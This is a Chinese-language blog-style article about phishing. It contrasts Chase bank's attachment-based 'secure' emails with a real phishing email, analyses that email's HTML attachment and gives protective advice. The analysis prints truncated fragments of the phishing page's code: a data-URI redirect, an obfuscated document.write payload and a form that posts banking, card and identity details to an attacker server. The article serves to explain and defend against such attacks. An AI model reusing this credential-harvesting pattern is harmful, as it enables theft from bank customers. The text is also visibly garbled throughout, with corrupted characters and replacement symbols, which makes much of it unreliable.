為什么釣魚攻擊總能成功

當(dāng)我第一次收到銀行發(fā)來的“安全”郵件時， 我第一反應(yīng)就是這里是否有詐？因?yàn)樵谖铱磥恚?它實(shí)在是太像釣魚郵件了。 這封躺在收件箱里的郵件來源于我銀行經(jīng)理的個人郵箱地址， 而非Chase銀行的官方郵箱。 郵件中不僅附帶有一個HTML頁面， 而且還有文字告訴我“在瀏覽器中打開這個頁面以了解如何進(jìn)行下一步操作”， 這一切瞬間讓我提高了警惕。

首先， 本身電子郵件這個東西就是不安全的， 更何況是我的銀行還發(fā)送了一封帶有附件的“安全”郵件給我。 這看起來就像是一次教科書般的釣魚攻擊， 所以我趕緊拿起電話直接打給了我的銀行經(jīng)理。

“不是的， 這是合法郵件。 我需要你將它打印出來， 然后簽署一些文件。 ”這就是銀行經(jīng)理給我的回答。

但我說到：“首先， 郵件發(fā)送人的地址看起來就非�？梢�， 而且這種郵件不僅要讓我點(diǎn)擊外部鏈接并打開附件， 而且還要我在Web表單中填寫我的個人信息， 這誰會信�。�”

銀行經(jīng)理說到：“我完全理解， 這確實(shí)會讓人懷疑。 但這封郵件沒有任何問題， 我的確發(fā)過這封郵件給你， 如果需要的話我還可以再發(fā)一次。 ”

于是乎， 他果然又發(fā)了一封給我。 這封重發(fā)的郵件看起來與之前那封完全一樣， 但這一次我正在與我的銀行經(jīng)理通話， 所以我按照要求打開了附件。 郵件中有一個“點(diǎn)擊讀取信息”的按鈕， 點(diǎn)擊之后將我重定向到了Chase銀行的安全郵件門戶網(wǎng)站。 但是整個過程讓我感到非常的奇葩， 我也將我擔(dān)心的地方告訴了我的銀行經(jīng)理、他的上司、以及Chase的客戶支持部門。

值得一提的是， 我們是不可能完完全全地對客戶的行為進(jìn)行安全培訓(xùn)的， 而銀行所采用的交互方式與釣魚攻擊幾乎沒有區(qū)別， 這就非常危險(xiǎn)了。

攻擊分析

近期， 我收到了一封真正的釣魚郵件。 這封郵件來自chase.online@chasee.com， 它很明顯是封偽造的郵件， 但如果不仔細(xì)的話還是看不出什么端倪的。 這封郵件聲稱我的銀行賬號近期出現(xiàn)了很多錯誤操作， 并且跟之前那封真實(shí)的郵件一樣， 它也讓我在瀏覽器中打開附件HTML文件并按提示進(jìn)行操作。

但很明顯我不會按它說的做！于是， 我把HTML文件下載了下來， 然后把它拖到了代碼審查窗口中。 我發(fā)現(xiàn)， 除了正常的HTML代碼之外， 文件中還包含一段腳本代碼：

window.location="data:text/html;,PCFET0NUWVBFIEhUTUwg...

這個頁面會在地址欄中顯示一大堆編碼的數(shù)據(jù)， 代碼本身包含有Chase銀行官網(wǎng)的腳本、圖片以及指向合法頁面的鏈接， 整個頁面看起來和正常的Chase銀行登錄頁面沒什么區(qū)別。 但是， 代碼中還包含有其他的腳本代碼（經(jīng)過混淆）， 這些代碼會在登錄頁面中添加一個自定義的表單：

document.write(unescape('%3C%66%6F%72...

在對代碼進(jìn)行了反混淆之后， 我發(fā)現(xiàn)所有的代碼都與Chase銀行的真實(shí)登錄頁面一致， 只不過表單action屬性指向的是攻擊者所控制的服務(wù)器。

<form action="http://191..."class="button" method="post" name="submit"id="submit">

如果不知情的用戶真的在瀏覽器中打開了這個頁面， 那么他們將會看到一個帶有Chase商標(biāo)的頁面讓他們確認(rèn)以下信息：

1. 賬號登錄信息

2. 聯(lián)系信息

3. 銀行卡信息

4. 社保號和駕駛證信息等等

上述所有的這些信息都不會提交給Chase， 而是提交給了攻擊者自己的服務(wù)器。 這臺由攻擊者控制的服務(wù)器在成功獲取到了這些數(shù)據(jù)之后， 會將用戶重定向到Chase的在線登錄頁面， 所以這會讓用戶完全無法察覺到異常。 我認(rèn)為， 之所以用戶會這樣做， 完全是因?yàn)镃hase平時對用戶的“訓(xùn)練”所導(dǎo)致的（通過郵件附件要求用戶提供身份驗(yàn)證信息）。

如何保護(hù)自己

除非Chase銀行不再通過這種帶有附件HTML的郵件來要求用戶登錄并填寫自己的信息， 否則廣大Chase銀行的客戶還是免不了遭受釣魚攻擊。 但是， 我們?nèi)匀挥泻芏喾椒�可以避免自己落入這種網(wǎng)絡(luò)釣魚陷阱之中。

首先， 千萬不要直接打開郵件中的附件網(wǎng)頁， 除非你能夠百分之百確定這封郵件沒有任何問題。 其次， 永遠(yuǎn)不要輕易在任何網(wǎng)頁中填寫自己的個人信息。 第三， 如果郵件要求你提供個人信息， 而你也不得不這樣做的話， 請直接訪問在線服務(wù)的官方網(wǎng)站去填寫， 千萬不要圖方便直接點(diǎn)擊郵件中的地址。 這些方法同樣適用于電話釣魚。 永遠(yuǎn)不要輕易在電話中給出自己的個人信息， 除非那個電話是你打過去的。

最后， 請你不要嫌麻煩， 一定要將所有不正常的情況上報(bào)給自己的服務(wù)商。 當(dāng)你遇到了勒索郵件或有人嘗試通過電話來竊取你的信息時， 請一定要即使報(bào)告。

總結(jié)

實(shí)際上， 如果想要保護(hù)用戶不受網(wǎng)路釣魚攻擊的侵害， 僅僅依靠提高用戶安全意識還是遠(yuǎn)遠(yuǎn)不夠的， 這個過程中廠商也要負(fù)起一定的責(zé)任。 所謂心中無鬼， 天下無鬼。 很多廠商知道這封郵件是他們自己發(fā)的， 就不會太在意去證明郵件的安全性與合法性， 但對于用戶來說， 當(dāng)他們習(xí)慣了這樣的交互方式時， 也就給了釣魚攻擊者可乘之機(jī)。